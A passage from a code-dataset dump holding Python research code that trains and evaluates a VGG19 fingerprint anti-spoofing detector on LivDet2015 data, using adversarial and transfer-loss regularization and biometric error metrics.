range(NUM_MATERIALS):\n print(*train_results_[k], sep = \", \") \n \n print()\n print()\n print(\">>Test results\")\n \n results_test = []\n \n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n \n if iteration == NUM_ITERATIONS-1: \n np.savetxt(DATASET + '_' + attack_txt + '_test.txt', results_test, fmt='%.3f', delimiter=',')\n \n '''\n print()\n print()\n print(\">>Test results\")\n print()\n print(\"Acc: {}\".format(acc_array))\n print(\"APCER: {}\".format(apcer_array))\n print(\"BPCER: {}\".format(bpcer_array))\n print(\"EER: {}\".format(eer_array))\n print(\"BPCER@APCER=1%: {}\".format(bpcer_apcer1_array))\n print(\"BPCER@APCER=5%: {}\".format(bpcer_apcer5_array))\n print(\"BPCER@APCER=10%: {}\".format(bpcer_apcer10_array))\n print(\"APCER1: {}\".format(apcer1_array))\n print(\"APCER5: {}\".format(apcer5_array))\n print(\"APCER10: {}\".format(apcer10_array))\n '''\n \n print(\"\\n\\nDONE!\")\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.48284709453582764, "alphanum_fraction": 0.4965992569923401, "avg_line_length": 41.757652282714844, "blob_id": "d6e0a5cb57db753ae865a98405e6ffed46057d34", "content_id": "35d790e34e0e56159e1d419adafb4327aaea11b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33522, "license_type": "no_license", "max_line_length": 465, "num_lines": 784, "path": "/VGG/run_vgg_reg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom statistics import mean\nimport pickle\nimport math\nimport sys\nimport torchvision.models as models\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\nsys.path.insert(0, 'layers/')\nsys.path.insert(0, 'losses/')\n\nfrom vgg_utils import _nanargmin, set_parameter_requires_grad, frange\nfrom data_vgg import get_data_loaders\n\nfrom losses_fpad import softCrossEntropyUniform, signer_transfer_loss\n\n#%%\n\n# layers to regularize\nCONV_LAYERS = -1\n\ndef split_batch_per_signer(x, y, g_norm, h_conv, y_task, n_signers):\n\n \n \"\"\"split data per signer identity\n\n Parameters:\n x (type): batch of data\n y (type): batch of gesture labels\n g_norm (type): batch of signer iodentities labels\n h_conv (type): activations of conv layers\n h_dense (type): activations of dense layers\n y_task (type): class labels predictions\n n_signers (type): number of training signer identities\n\n Returns:\n x_split (type): x splitted by signer identity\n y_split (type): y splitted by signer identity\n g_split (type): g splitted by signer identity\n h_conv_split (type): h_conv splitted by signer identity\n h_dense_split (type): h_dense splitted by signer identity\n y_task_split (type): y_task splitted by signer identity\n\n \"\"\"\n x_split = [False]*n_signers\n y_split = [False]*n_signers\n g_split = [False]*n_signers\n y_task_split = [False]*n_signers\n h_conv_split = [False]*n_signers\n\n for s in range(n_signers):\n x_split[s] = x[g_norm == s]\n y_split[s] = y[g_norm == s]\n g_split[s] = g_norm[g_norm == s]\n\n h_conv_split[s] = [torch.mean(h[g_norm == s], dim=0)\n for h in h_conv[CONV_LAYERS:]]\n y_task_split[s] = y_task[g_norm == s]\n\n return x_split, y_split, g_split, h_conv_split, y_task_split\n\n\n#%% \n\nEPOCHS = 100\n\nloss_fn = F.cross_entropy\n\nLEARNING_RATE = 1e-04\nREG = 1e-04\n\n#Regularization weights for optimization\nADV_WEIGHT_LIST = frange(0, 1, 0.1)\nTRANSFER_WEIGHT_LIST = frange(0, 1, 0.1)\n\n#Regularization weights for training\nADV_WEIGHT_ = 0 #0.23\nTRANSFER_WEIGHT_ = 0 #0.64\n\ndef fit(model, data, device, model_path, output, unseen, n_fake, unknown_material, adv_weight, transfer_weight, optimization = False, step = -1):\n # train and validation loaders\n train_loader, valid_loader = data\n print(\"Train/Val batches: {}/{}\".format(len(train_loader),\n len(valid_loader)))\n \n feature_extractor = torch.nn.Sequential(*list(model.children())[0:2])\n\n task_classifier = torch.nn.Sequential(*list(model.children())[2])\n \n adv_classifier = torch.nn.Sequential(*list(model.children())[2])\n num_ftrs = model.classifier[6].in_features\n adv_classifier[6] = nn.Linear(num_ftrs,3)\n \n feature_extractor = feature_extractor.to(device)\n task_classifier = task_classifier.to(device)\n adv_classifier = adv_classifier.to(device)\n\n # Set the optimizer\n task_opt = torch.optim.Adam(list(feature_extractor.parameters()) + \n list(task_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n adv_opt = torch.optim.Adam(list(adv_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n # Start training\n train_history = {'train_loss': [], 'train_task_loss': [], 'train_transf_loss': [], 'train_adv_loss': [], 'train_ce_uniform_loss': [], 'train_acc': [], 'train_apcer': [], 'train_bpcer': [], 'train_eer': [], 'train_bpcer_apcer1': [], 'train_bpcer_apcer5': [], 'train_bpcer_apcer10': [], 'train_apcer1': [], 'train_apcer5': [], 'train_apcer10': [],\n 'val_loss': [], 'val_task_loss': [], 'val_transf_loss': [], 'val_adv_loss': [], 'val_ce_uniform_loss': [], 'val_acc': [], 'val_apcer': [], 'val_bpcer': [], 'val_eer': [], 'val_bpcer_apcer1': [], 'val_bpcer_apcer5': [], 'val_bpcer_apcer10': [], 'val_apcer1': [], 'val_apcer5': [], 'val_apcer10': []}\n\n # Best validation params\n best_val = -float('inf')\n best_epoch = 0\n\n for epoch in range(EPOCHS):\n \n if optimization:\n num_steps = len(ADV_WEIGHT_LIST)*len(TRANSFER_WEIGHT_LIST)\n print('\\n*** EPOCH {}/{} - Optimization step {}/{} - Material {}\\n'.format(epoch + 1, EPOCHS, step, num_steps, unknown_material))\n else:\n print('\\n*** EPOCH {}/{} - Material {}\\n'.format(epoch + 1, EPOCHS, unknown_material))\n\n # TRAINING\n model.train()\n for i, (x, y, f, f_norm) in enumerate(train_loader):\n\n x = x.to(device)\n\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n \n f_norm = f_norm.type(torch.LongTensor)\n f_norm = f_norm.to(device)\n \n # split real and fake observations\n x_real = x[f == -1]\n x_fake = x[f != -1]\n \n if x_real.shape[0] == 0 or x_fake.shape[0] == 0 :\n continue\n \n y_real = y[f == -1]\n y_fake = y[f != -1]\n y_concat = torch.cat([y_real, y_fake], dim=0)\n \n f_norm_fake = f_norm[f != -1]\n \n \n # forward pass\n h_conv = feature_extractor(x) \n h_fake = feature_extractor(x_fake)\n \n h_conv_flat = h_conv.view(h_conv.size(0), -1)\n h_fake_flat = h_fake.view(h_fake.size(0), -1)\n \n \n y_task = task_classifier(h_conv_flat)\n y_adv = adv_classifier(h_fake_flat)\n \n # Compute task-specific loss\n task_loss = loss_fn(y_task, y)\n \n # Compute adversial loss\n adv_loss = loss_fn(y_adv, f_norm_fake)\n \n \n # Compute signer-transfer loss (split activations per fake material)\n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, [h_conv], y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss(h_conv_split, fake_on_batch)\n\n # Joint\n loss = (task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_loss*transfer_weight)\n \n \n task_opt.zero_grad()\n loss.backward(retain_graph=True)\n task_opt.step()\n\n \n adv_opt.zero_grad()\n adv_loss.backward()\n adv_opt.step()\n \n \n # display the mini-batch loss\n sys.stdout.write(\"\\r\" + '........{}/{} mini-batch loss: {:.3f} |'\n .format(i + 1, len(train_loader), loss.item()) +\n ' task_loss: {:.3f} |'\n .format(task_loss.item()) +\n ' transfer_loss: {:.3f} |'\n .format(transfer_loss.item()) +\n ' adv_loss: {:.3f}'\n .format(adv_loss.item()))\n sys.stdout.flush()\n \n # Validation\n tr_loss, tr_task_loss, tr_transf_loss, tr_adv_loss, tr_ce_uniform_loss, tr_acc, tr_apcer, tr_bpcer, tr_eer, tr_bpcer_apcer1, tr_bpcer_apcer5, tr_bpcer_apcer10, tr_apcer1, tr_apcer5, tr_apcer10 = eval_model(model, train_loader, device, n_fake=n_fake, adv_weight = adv_weight, transfer_weight = transfer_weight, is_train=True)\n train_history['train_loss'].append(tr_loss.item())\n train_history['train_task_loss'].append(tr_task_loss.item())\n \n if unseen == True:\n if isinstance(tr_transf_loss, float) == False:\n train_history['train_transf_loss'].append(tr_transf_loss.item())\n else:\n train_history['train_transf_loss'].append(tr_transf_loss)\n \n \n train_history['train_adv_loss'].append(tr_adv_loss.item())\n train_history['train_ce_uniform_loss'].append(tr_ce_uniform_loss.item())\n train_history['train_acc'].append(tr_acc)\n train_history['train_apcer'].append(tr_apcer)\n train_history['train_bpcer'].append(tr_bpcer)\n train_history['train_eer'].append(tr_eer)\n train_history['train_bpcer_apcer1'].append(tr_bpcer_apcer1)\n train_history['train_bpcer_apcer5'].append(tr_bpcer_apcer5)\n train_history['train_bpcer_apcer10'].append(tr_bpcer_apcer10)\n train_history['train_apcer1'].append(tr_apcer1)\n train_history['train_apcer5'].append(tr_apcer5)\n train_history['train_apcer10'].append(tr_apcer10)\n\n val_loss, val_task_loss, val_transf_loss, val_adv_loss, val_ce_uniform_loss, val_acc, val_apcer, val_bpcer, val_eer, val_bpcer_apcer1, val_bpcer_apcer5, val_bpcer_apcer10, val_apcer1, val_apcer5, val_apcer10 = eval_model(model, valid_loader, device, n_fake=n_fake, adv_weight = adv_weight, transfer_weight = transfer_weight)\n train_history['val_loss'].append(val_loss.item())\n train_history['val_task_loss'].append(val_task_loss.item())\n train_history['val_acc'].append(val_acc)\n train_history['val_apcer'].append(val_apcer)\n train_history['val_bpcer'].append(val_bpcer)\n train_history['val_eer'].append(val_eer)\n train_history['val_bpcer_apcer1'].append(val_bpcer_apcer1)\n train_history['val_bpcer_apcer5'].append(val_bpcer_apcer5)\n train_history['val_bpcer_apcer10'].append(val_bpcer_apcer10)\n train_history['val_apcer1'].append(val_apcer1)\n train_history['val_apcer5'].append(val_apcer5)\n train_history['val_apcer10'].append(val_apcer10)\n\n\n # save best validation model\n if best_val < val_acc:\n torch.save(model.state_dict(), model_path + 'cnn2_reg_fpad.pth')\n best_val = val_acc\n best_epoch = epoch\n\n # display the training loss\n print()\n print('\\n>> Train loss: {:.3f} |'.format(tr_loss.item()) + ' Train Acc: {:.3f}'.format(tr_acc) + '\\n Train APCER: {:.3f} |'.format(tr_apcer) + ' Train BPCER: {:.3f}'.format(tr_bpcer) + '\\n Train EER: {:.3f}'.format(tr_eer))\n\n print('\\n>> Train task loss: {:.3f} |'.format(tr_task_loss.item()) + ' Train transfer loss: {:.3f}'.format(tr_transf_loss) + '\\n Train adversarial loss: {:.3f} |'.format(tr_adv_loss) + ' Train CE Uniform loss: {:.3f}'.format(tr_ce_uniform_loss.item()) )\n\n print('\\n>> Valid task loss: {:.3f}'.format(val_task_loss.item()) )\n\n print('\\n>> Valid loss: {:.3f} |'.format(val_loss.item()) + ' Valid Acc: {:.3f}'.format(val_acc) + '\\n Valid APCER: {:.3f} |'.format(val_apcer) + ' Valid BPCER: {:.3f}'.format(val_bpcer) + '\\n Valid EER: {:.3f}'.format(val_eer))\n\n if optimization == False:\n print('\\n>> Best model: {} / Acc={:.3f}'.format(best_epoch+1, best_val))\n \n print()\n\n if unseen == True:\n # save train/valid history\n plot_fn = output + 'cnn2_reg_fpad_history_TASK.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n # return best validation model\n model.load_state_dict(torch.load(model_path + 'cnn2_reg_fpad.pth'))\n\n return model, train_history, valid_loader, best_epoch+1\n\n\ndef plot_train_history(train_history, plot_fn=None):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_loss = train_history['val_loss'][best_val_epoch]\n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_loss'])\n x = range(epochs)\n plt.subplot(211)\n plt.plot(x, train_history['train_loss'], 'r-')\n plt.plot(x, train_history['val_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val loss')\n plt.legend(['train_loss', 'val_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_loss'])])\n plt.subplot(212)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n if plot_fn:\n #plt.show()\n plt.savefig(plot_fn)\n plt.close()\n else:\n plt.show()\n\n\ndef eval_model(model, data_loader, device, n_fake, adv_weight, transfer_weight, debug=False, is_train=False):\n\n feature_extractor = torch.nn.Sequential(*list(model.children())[0:2])\n\n task_classifier = torch.nn.Sequential(*list(model.children())[2])\n \n adv_classifier = torch.nn.Sequential(*list(model.children())[2])\n num_ftrs = model.classifier[6].in_features\n adv_classifier[6] = nn.Linear(num_ftrs,3)\n \n feature_extractor = feature_extractor.to(device)\n task_classifier = task_classifier.to(device)\n adv_classifier = adv_classifier.to(device)\n \n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n task_loss_eval = 0\n transf_loss_eval = 0\n adv_loss_eval = 0\n CE_unif_loss_eval = 0\n \n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n \n for i, (x, y, f, f_norm) in enumerate(data_loader):\n # send mini-batch to gpu\n x = x.to(device)\n\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n \n f_norm = f_norm.type(torch.LongTensor)\n f_norm = f_norm.to(device)\n \n # split real and fake observations\n x_real = x[f == -1]\n x_fake = x[f != -1]\n \n if x_real.shape[0] == 0 or x_fake.shape[0] == 0 :\n continue\n \n y_real = y[f == -1]\n y_fake = y[f != -1]\n y_concat = torch.cat([y_real, y_fake], dim=0)\n \n f_norm_fake = f_norm[f != -1]\n \n \n # forward pass\n h_conv = feature_extractor(x) \n h_fake = feature_extractor(x_fake)\n \n h_conv_flat = h_conv.view(h_conv.size(0), -1)\n h_fake_flat = h_fake.view(h_fake.size(0), -1)\n \n \n y_task = task_classifier(h_conv_flat)\n y_adv = adv_classifier(h_fake_flat)\n \n\n # Compute task-specific loss\n task_loss = loss_fn(y_task, y)\n \n \n # Compute adversial loss\n adv_loss = 0\n if is_train and f_norm_fake.shape[0] != 0:\n adv_loss = loss_fn(y_adv, f_norm_fake)\n\n # Compute signer-transfer loss\n # split activations per fake material\n # Compute signer-transfer loss (split activations per fake material)\n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, [h_conv], y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss(h_conv_split, fake_on_batch)\n\n # Joint\n loss = (task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_loss*transfer_weight)\n \n \n # Sum losses\n loss_eval += loss * x.shape[0]\n task_loss_eval += task_loss * x.shape[0]\n transf_loss_eval += transfer_loss * x.shape[0]\n adv_loss_eval += adv_loss * x.shape[0]\n CE_unif_loss_eval += softCrossEntropyUniform(y_adv) * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.argmax(y_task, dim=1)\n n_correct += torch.sum(1.*(ypred_ == y_concat)).item()\n \n y_concat = y_concat.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y_concat))\n TN += np.sum(np.logical_and(1-ypred_, 1-y_concat))\n \n FP += np.sum(np.logical_and(ypred_, 1-y_concat))\n FN += np.sum(np.logical_and(1-ypred_, y_concat))\n \n PA += np.sum(y_concat == 0)\n BF += np.sum(y_concat == 1)\n \n #probs = model.predict(x)\n \n probs = F.softmax(y_task, dim=1)\n \n probs = probs.cpu().numpy()\n\n probs = probs[:, 1]\n \n fpr, tpr, threshold = metrics.roc_curve(y_concat, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n task_loss_eval = task_loss_eval / N\n transf_loss_eval = transf_loss_eval / N\n adv_loss_eval = adv_loss_eval / N\n CE_unif_loss_eval = CE_unif_loss_eval / N\n \n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) / (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = float(\"inf\")\n \n return loss_eval, task_loss_eval, transf_loss_eval, adv_loss_eval, CE_unif_loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n \n\n\ndef main():\n \n IMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n #IMG_PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n \n CUDA = 0\n \n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:\" + str(CUDA)) # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU\")\n \n #mode = input(\"Enter the mode [train/optim/test]: \")\n #data_ = input(\"Dataset [ALL/CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n\n mode = \"train\"\n data_=\"CrossMatch\"\n \n if mode != \"optim\":\n #unseen_ = input(\"Unseen attack? [y/n]: \")\n unseen_ = \"y\"\n else:\n unseen_ = \"y\"\n \n if unseen_ == \"y\":\n unseen = True\n NUM_ITERATIONS = 1\n attack_txt = \"UA\"\n elif unseen_ == \"n\":\n unseen = False \n NUM_ITERATIONS = 3\n attack_txt = \"OA\"\n else:\n sys.exit(\"Error ('Unseen attack?'): incorrect input!\")\n \n \n if data_ == \"ALL\":\n sensors = [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"] \n else:\n sensors = [data_]\n \n for DATASET in sensors:\n \n print(\"\\nRunning in \" + DATASET + \"...\\n\")\n \n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n else:\n NUM_MATERIALS = 4\n \n # For LOOP - Test splits\n train_results_ = []\n results = []\n best_epochs = [] \n optimization = [] \n \n for iteration in range(NUM_ITERATIONS):\n \n print(\"\\n-- ITERATION {}/{} --\".format(iteration+1, NUM_ITERATIONS))\n \n for test_material in range(NUM_MATERIALS):\n \n output_fn = \"results/\" + DATASET + \"/\" + DATASET + \"_\" + str(test_material) + \"_\"\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/VGG19bn_\" + DATASET + \"_\" + str(test_material) + \"_\"\n \n model = models.vgg19_bn(pretrained=True)\n set_parameter_requires_grad(model, feature_extracting=False)\n num_ftrs = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_ftrs,2)\n \n model = model.to(DEVICE)\n \n # Train or test\n if mode == 'train':\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n data=(train_loader, valid_loader),\n device=DEVICE,\n model_path = model_path, \n output=output_fn,\n unseen=unseen,\n n_fake=NUM_MATERIALS,\n unknown_material = test_material,\n adv_weight=ADV_WEIGHT_, \n transfer_weight=TRANSFER_WEIGHT_)\n \n # save train history\n train_res_fn = output_fn + \"cnn2_reg_fpad_history.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n train_results_.append([train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]])\n \n # Test results\n test_loss, test_task_loss, test_transf_loss, test_adv_loss, test_ce_uniform_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, DEVICE, n_fake = NUM_MATERIALS-1, adv_weight = ADV_WEIGHT_, transfer_weight = TRANSFER_WEIGHT_)\n print('\\nTest loss: {:.3f} |'.format(test_loss.item()) + ' Test Acc: {:.3f}'.format(test_acc) + '\\nTest APCER: {:.3f} |'.format(test_apcer) + ' Test BPCER: {:.3f}'.format(test_bpcer)) \n print('Test BPCER@APCER=1%: {:.3f} | Test APCER1: {:.3f}'.format(test_bpcer_apcer1, test_apcer1))\n print('Test BPCER@APCER=5%: {:.3f} | Test APCER5: {:.3f}'.format(test_bpcer_apcer5, test_apcer5))\n print('Test BPCER@APCER=10%: {:.3f} | Test APCER10: {:.3f}'.format(test_bpcer_apcer10, test_apcer10))\n print('Test EER: {:.3f}'.format(test_eer))\n print('Test task loss: {:.3f}'.format(test_task_loss))\n \n results.append((test_loss.item(), test_task_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n \n best_epochs.append(best_epoch)\n \n # save results\n res_fn = output_fn + 'results_reg.pckl'\n #pickle.dump(results, open(res_fn, \"wb\"))\n #results = pickle.load(open(res_fn, \"rb\"))\n \n elif mode == 'optim':\n \n \n best_accuracy = -1\n best_adv_weight = -1\n best_transfer_weight = -1\n \n step = 0\n \n for ADV_WEIGHT in ADV_WEIGHT_LIST:\n \n for TRANSFER_WEIGHT in TRANSFER_WEIGHT_LIST:\n \n #TRANSFER_WEIGHT = 0\n \n step = step + 1\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n data=(train_loader, valid_loader),\n device=DEVICE,\n model_path = model_path, \n output=output_fn,\n unseen=unseen,\n n_fake=NUM_MATERIALS,\n unknown_material = test_material,\n adv_weight=ADV_WEIGHT, \n transfer_weight=TRANSFER_WEIGHT,\n optimization = True,\n step = step)\n \n # save train history\n train_res_fn = output_fn + \"history_reg.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n history = [train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]]\n \n test_loss, test_task_loss, test_transf_loss, test_adv_loss, test_ce_uniform_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, DEVICE, n_fake = NUM_MATERIALS-1, adv_weight=ADV_WEIGHT, transfer_weight=TRANSFER_WEIGHT)\n \n if test_acc > best_accuracy:\n best_accuracy = test_acc\n best_adv_weight = ADV_WEIGHT\n best_transfer_weight = TRANSFER_WEIGHT\n test_results = (test_loss.item(), test_task_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10)\n tr_results = history\n \n optimization.append((best_accuracy, best_adv_weight, best_transfer_weight))\n \n train_results_.append(tr_results)\n results.append(test_results)\n \n elif mode == 'test':\n sys.exit(\"Error: in construction yet!\")\n '''\n model.load_state_dict(torch.load(\n os.path.join(*(output_fn, 'mlp_fpad.pth'))))\n \n # load train history\n res_fn = os.path.join(*(output_fn, '_history.pckl'))\n train_history = pickle.load(open(res_fn, \"rb\"))\n plot_fn = os.path.join(*(output_fn, 'mlp_fpad_history.png'))\n plot_train_history(train_history, plot_fn=plot_fn)\n '''\n else:\n sys.exit(\"Error: incorrect mode!\")\n \n ### PRINT RESULTS -----------------------------------------------------------------------------------------------------------------------------------\n print('\\n\\n\\n-------------------------------------------\\n-------------- R E S U L T S --------------\\n-------------------------------------------') \n \n print()\n print(\"***************\")\n print(DATASET)\n print(\"***************\")\n \n optim_res = []\n \n if optimization != []:\n \n print()\n for m in range(len(optimization)):\n print(\"\\n>> OPTIMIZATION RESULT MATERIAL {}:\\n\".format(m+1))\n print(\" - Best Accuracy = {}\".format(optimization[m][0]))\n print(\" - Best Adv Weight = {}\".format(optimization[m][1]))\n print(\" - Best Transfer Weight = {}\".format(optimization[m][2]))\n optim_res.append(optimization[m][0])\n optim_res.append(optimization[m][1])\n optim_res.append(optimization[m][2])\n print() \n \n optim_res = np.array(optim_res)\n np.savetxt(DATASET + '_optim.txt', optim_res, fmt='%.3f', delimiter=',')\n \n print('\\n-------------------------------------------') \n \n \n # Compute average and std\n task_loss_array = np.array([i[1] for i in results])\n acc_array = np.array([i[2] for i in results])\n apcer_array = np.array([i[3] for i in results])\n bpcer_array = np.array([i[4] for i in results])\n eer_array = np.array([i[5] for i in results])\n bpcer_apcer1_array = np.array([i[6] for i in results])\n bpcer_apcer5_array = np.array([i[7] for i in results])\n bpcer_apcer10_array = np.array([i[8] for i in results])\n apcer1_array = np.array([i[9] for i in results])\n apcer5_array = np.array([i[10] for i in results])\n apcer10_array = np.array([i[11] for i in results])\n \n \n if best_epochs != []:\n #Best epochs\n print('\\nBest epochs:', end=\" \")\n for epoch in best_epochs:\n print(epoch, end=\" \")\n print()\n \n #Results of all loops (train and test)\n np.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n print()\n print(\"[Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]\")\n print()\n print(\">> TRAIN RESULTS:\")\n print()\n for k in range(NUM_MATERIALS):\n print(*train_results_[k], sep = \", \") \n \n print()\n print(\">> TEST RESULTS:\")\n print()\n \n results_test = []\n \n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n \n if iteration == NUM_ITERATIONS-1: \n np.savetxt('results/' + DATASET + '_' + attack_txt + '_test_TASK.txt', results_test, fmt='%.3f', delimiter=',')\n \n print(\"\\n\\nDONE!\")\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6557231545448303, "alphanum_fraction": 0.6681455373764038, "avg_line_length": 27.174999237060547, "blob_id": "f3a9e27919d814ea99d4e1666ef630b05e1cb504", "content_id": "b069a94e6906deef5e5efbd6c2b440cc8d48d0e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1127, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/VGG/losses/losses_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.nn.functional import log_softmax\nimport itertools\n\ndef pairwise_loss(signers_combo_list, h_list):\n \"\"\"Computes pairwise signer-transfer loss\"\"\"\n loss = 0\n for s1, s2 in signers_combo_list:\n for l_s1, l_s2 in zip(h_list[s1], h_list[s2]):\n loss += torch.sum((l_s1 - 